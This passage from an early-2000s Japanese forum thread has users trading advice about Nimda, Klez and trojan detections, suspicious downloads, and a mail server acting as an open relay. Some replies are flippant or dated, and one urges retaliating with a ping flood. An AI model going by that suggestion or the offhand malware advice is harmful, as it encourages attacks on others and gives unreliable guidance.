>>778
多分、フラッシュの広告が2chに導入されたってことなんではないでしょか。
ちゅか、無視しれ。
どこのURLかわからんので、漏れは見ておりませぬ。
そゆ点はご自身で検証してくだされ。

>>779
情報不足。

>>778バージョンアップしろ
まさかフラッシュプレイヤーが何かしらんとかいう馬鹿じゃないよな？

>>779無視しろ
Whoisとかで相手はわかるが、だからどうしたという程度のもの
吊るし上げるつったって、この板じゃそんなオナニー野郎は無視されるだけ
やるならPingを10000回くらい打ち返せ

>>779
どこがウイルスなのかと。

>>780-781
ってことは、安心していいってことでしょうか？

Ｐｉｎｇ１００００００回打ち返すぐらいの気概が欲しいね

それとなぜ２ちゃんのある特定の板でしか出ないのかわかりません。

>>778オナニーは半角板でやれってこと

[アプリ] ＣＤ革命6.0 Virtual Pro(win2k+Win9x+XP対応)(1)をwinMXでダウソしたんですが、
winMX落としてはいけないものリスト　http://mxtrojan.tripod.co.jp/　によると、再起動後、
全HDDを消去とあります。zipをおとしただけなら大丈夫でしょうか？削除したほうがいいですか？
なにとぞ教えてください。おながいします。

>>786
いや、素に困ってるんですが・・

>>788
じゃあふざけるな

>>789
ええー！？
どこもふざけてませんよ。

>>787
MX関連は自己責任でどうぞ。

>>791　すみません。消します。はぁ〜。

ここで聞くのか携帯板がいいのか迷ったんですが・・・
最近携帯メール宛にウィルスメールと思われるものが来ます。
内容はエラーメッセージで、添付ファイル付き。
ドコモユーザーのため添付ファイルは自動的に削除されるので
どんなファイルなのか分からないのですが
読んだだけでも感染するとかってあるんでしょうか？
そもそも携帯メールのウィルスって周りじゃ聞いたことがないんですが
詳しい方がいらっしゃったら教えて下さい。

よーく考えろ
Windows用にかかれたウィルスが携帯で実行できるかを

VirtualPC for DoCoMo

＞７９４、７９５さん
すいません、私、全然詳しくないので考えても分からないです・・・
ごめんなさい。
実行出来ない、ということでよろしいんでしょうか？
それとも有り得るという意味なんでしょうか？
うっかりメールを読んでしまったので不安です。

>>795
あったら面白いかも。
でもバシリスクのエラーまみれで、エミュを業務に使うにあたっての限界を感じた。

>>796
ウィルスといってただのプログラム
PS２のソフトがファミコンで動くか？
それと同じ事

ＰＣ初心者板でも質問したのですが、
イマイチわからなかったので教えてください。

ノートンのリアルタイムスキャンで　W32.Nimda.enc　が引っかかります。
最近、毎日のようにひっかかります。
メーラーはＯＥですが、ＯＥを常駐させていないときでも、突然
「C:\DOCUMENTS AND SETTINGS\ALL USERS\DOCUMENTS\# ＸＸＸＸ.eml」
に発見されたと言われます。
毎回自動隔離されているんですが、頻繁に起こるものなので・・・。

ノートン定義ファイルは最新版です。
隔離しても、ウイルスは有効で、かつＰＣをほうっておいても
リアルタイムスキャンによるウイルス検出が起こる・・・
こういうもんなんでしょうか？

ご教授の程、お願いします。

手動でnimdaが添付されてるらしきメールを削除

>>800
プレビュー機能を切って、ＯＥ上で・・・ということですか？
つまりマイドキュメント内で発見されるemlファイルは、
ニムダ本体によって定期的に生成されていて
ノートンはそれに反応している・・・という解釈でよろしいですか？

普段はバスターオンラインも反応しない・・・
バスターオンラインはダメなんですね・・・。

ありがとうございます。

>つまりマイドキュメント内で発見されるemlファイルは、
>ニムダ本体によって定期的に生成されていて
>ノートンはそれに反応している・・・という解釈でよろしいですか？
感染してるわけじゃないんだから、んなわけない

>>802
ではなぜマイドキュメントでウイルスが発見されるんでしょうか・・・！？

>>803感染してんじゃネーノ？

「Nimda !! 」【その４】
http://pc.2ch.net/test/read.cgi/sec/1001864573/-100

シマンテック見てきたけど
削除ツール使わんと完全削除されない可能性ありって書いてるし
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.e%40mm.html

>>804
ノートン最新定義ファイル
バスターオンライン
シマンテックオンライン

これらではＰＣ内スキャンしても発見できませんでした。
時々リアルタイムスキャンでW32.Nimda.encが引っかかる。
マイドキュメントかマイピクチャーで。
専用駆除ツールを使わないと見つけることさえできない、と・・・！？

おそろしい・・・。

>>805
アンチドート簡易版は
フリーで検出のみだけど799さん感染してるなら
ちょっとこいつで実験してみてくれないか？
ノートン並の検出率のソフトなんだけど。

http://www.vector.co.jp/soft/win95/util/se108623.html

>>799
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
http://www.ipa.go.jp/security/topics/newvirus/nimda_01.html

見過ごされやすいが、.eml、.htmなどの拡張子を持つウィルスの素は、
Explorerをサムネイル表示させてると、思わぬところで感染することがあるよ。
これで、PostPetユーザの知人のマシンがメールの添付ファイルを実行せずして、
VBS.Haptime.Aに感染した。パッチあててなかった当人も悪いんだけどね。

してみると、いくら流行ってるとはいえ
klezが危険度４で、nimdaが危険度３ってのは納得いかんね

キヤノン（Canon）インターネットサービスは第三者中継を行います。
http://www.canonet.ne.jp/
http://www.canonet.ne.jp/service/kaka_00.html
ホスティングサービスなどがあるが大丈夫か？？？？？？

http://www.nanet.co.jp/rlytest/relaytest.html
www.canonet.ne.jp (pri=10)
問題あり：不正な中継を受け付けます。
(202.228.190.225)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

http://www.ordb.org/lookup/?host=www.canonet.ne.jp
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: www.canonet.ne.jp (202.228.190.225)
ORDB.org への初回登録日時: 2002-08-19 00:44 GMT
初回送信ホスト: 195.82.124.110
最終検査日時: 2002-08-19 00:44 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin＠bockscar.ordb.org
Received: from www.canonet.ne.jp (www.canonet.ne.jp [202.228.190.225])
by BocksCar.ORDB.org (Postfix) with ESMTP id 6E3435C47
for ; Mon, 19 Aug 2002 00:44:30 +0000 (GMT)
Received: from localhost.localdomain (ns.fgnet.dk [212.242.88.2])
by www.canonet.ne.jp (8.11.1/3.7W-01032503) with ESMTP id g7IMiQQ30724
for ; Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Date: Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Message-Id: < [email protected] >
From: [email protected]
To: marvin%[email protected]
X-ORDB-Envelope-From: [email protected]
X-ORDB-Envelope-To: marvin%[email protected]
Subject: ORDB.org check (0.2807038021476490.2895395453) ip=202.228.190.225

ここで判明
只今までに検出されたウィルス 本日分（リアルタイム更新）
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
2002-09-04 09:53:49 W32.Klez.H@mm < [email protected] >
2002-09-04 13:49:08 W32.Klez.H@mm < [email protected] >
2002-09-04 23:42:31 W32.Klez.H@mm < [email protected] >

>>808
確かに。
『感染しました』っていうと、『初期化をお勧めします』が一般的なんだけど、
初期化直後は穴だらけで怖いってことも十分教えて欲しいね。
その怖さが身にしみている人は、↓これから目が離せないんじゃないかな。

http://www.cert.org/advisories/
http://www.microsoft.com/japan/technet/security/current.asp
http://windowsupdate.microsoft.com/

　　 ∧＿∧　　／￣￣￣￣￣
　　（　´_ゝ`）＜　ふーん
　　（　　　　） 　＼＿＿＿＿＿
　　｜ ｜　|
　　（_＿）＿)



　　 ∧＿∧　　
　　（ ´,_ゝ｀）ﾌﾟｯ
　　（　　　　）
　　｜ ｜　|
　　（_＿）＿)

>>809-811

>>809-811
お前すげーうざいんだけど。

>>806
了解です。
チェックしてきます。

>>807
いえ、それはわかるのですが、
なぜノートン＆バスターオンラインでは反応しないのかな・・・と。

>>799 >>816
こんなのあったね。
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html

W32.Nimda.(Aor亜種)感染メールから添付ファイルを検疫した後の
残骸本文を検出したのか、W32.Nimdaの脅威を持つ新たな亜種を検出したのか、
どっちかということらしい。

＞ ＯＥを常駐させていないときでも、突然・・・
もともとWindows自体にそういう挙動があるからね。
感染・懐疑ファイルにアクセスしようとするものがあれば、
当然、Nortonは割って入るだろうね。

それと、アンチウィルスが何か検知したらしい場合は、
掲示板で尋ねるのではなく、ベンダーのウィルス情報ページで調べ、
判らなければ、ベンダーに問い合わせるのが基本ではないかな？
このプロセスによって、新種・亜種が確認される場合もあり得るわけだから。

なんか上の方で安全とか言われてたんですが・・
ダウンロードした直後にウィルススキャンしたら
やっぱウィルスだったみたいなんですが・・。

圧縮されてるものを解凍するだけじゃ
絶対にウイルスに感染することは
ないんでしょうか？

>>819
ある

>>820
ありがとう。

股、北!!!!!!so-netからasahi-itを通じてKlez
http://www.asahi-it.com/
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com) (210.174.168.200)
by **; 04 Sep 2002 21:37:18 +0900 (JST)
Received: from Ovxg (p294b5b.kngwnt01.ap.so-net.ne.jp [218.41.75.91])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g84Cb0034612
for < [email protected] >; Wed, 4 Sep 2002 21:37:00 +0900 (JST)
Date: Wed, 4 Sep 2002 21:37:00 +0900 (JST)
Message-Id:< [email protected] >
From: bac < [email protected] >
To: [email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Subject: Hello,ds,congratulations

asahi-it.com Klezを検索すると、
http://www.scramble-egg.com/virusinfo.htm
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
が引っかかる。

>>778ならMacroMediaに言え

　　　　　　　　　　　　i⌒i　ｽｯ
　　　　　　　 　　　　 |　〈　
　　　　　　∧＿∧　/ .フ
　　　　　 （　´_ゝ`）/　 |　　
　　　　／　　　　 /.　 ﾉ
　　　/ /＼　　　/ 　 |
　＿|￣￣ ＼　/.　　ﾉ＿_
　＼￣￣￣￣￣￣>>822＼
　　||＼　　　　　　　　　　　　 ＼
　　||＼||￣￣￣￣￣￣￣|| ￣
　　||　 ||￣￣￣￣￣￣￣||
　　 　 .||　 　 　 　 　 　 　 ||



　　帰宅してくださいよ。
.　　　　　　　 　　　　　　　|
　　　　　　∧＿∧ 　　　 ||
　　　　　 （　´_ゝ`）.　　　|||
　　　　／　　　　 ＼. 　　|||| バチーン!!
　　　/ /＼　　　/￣＼　┻|||| 　　　　　.'　　，　．.
　＿|￣￣ ＼　/　 ヽ　＼从/／　・;`.∴　'　　　　　
　＼￣￣￣￣￣￣ ＼＿_）　＜　,：;・,‘　　
　　||＼　　　　　　　　　　　　＼ . 　　’ .'　，　．.
　　||＼||￣￣￣￣￣￣￣||￣
　　||　 ||￣￣￣￣￣￣￣||
　　 　 .||　 　 　 　 　 　 　 ||

JS.Trojan.Cardst
というウイルスにかかってしまいました
最近ダウンロードしたファイルはkageぐらいしか思いつきません
現時点での疑問点に答えていただけると助かります

１．ウイルス対策ソフトは持っていないのですが、駆除できますか？
２．現時点で他人に迷惑かけている可能性ありますか？
３．ウインドウズを再インストールしたら駆除できますか？
　　（ウイルス対策ソフトを買うべきですか？）

825に追加です
フリーのアンチドートの検索結果では、

C:\WINDOWS\Temporary Internet Files
\Content.IE5\SL6V09M7\index[2].htm = ｳｲﾙｽ感染 : Trojan.JS.Cardst

とでるのですが、\Temporary Internet Files以下のフォルダが見つかりません

> ２．現時点で他人に迷惑かけている可能性ありますか？
ありますね...

>>825-826
デスクトップのIEのアイコンをマウス右押し→全般→インターネット一時ファイル→ファイルの削除。

>826
＞とでるのですが、\Temporary Internet Files以下のフォルダが見つかりません

隠しファイルは表示してる？

>>827
知らないうちにあっちこっちにメールが届いてたりします？

>>828
試したけど残ってました

>>829
表示してます

その後トレンドマイクロのオンラインスキャンで
C:\WINDOWS\Temporary Internet Files
を検索したら引っかかりなかったけど
アンチドートだと感染してました。どうしよう・・・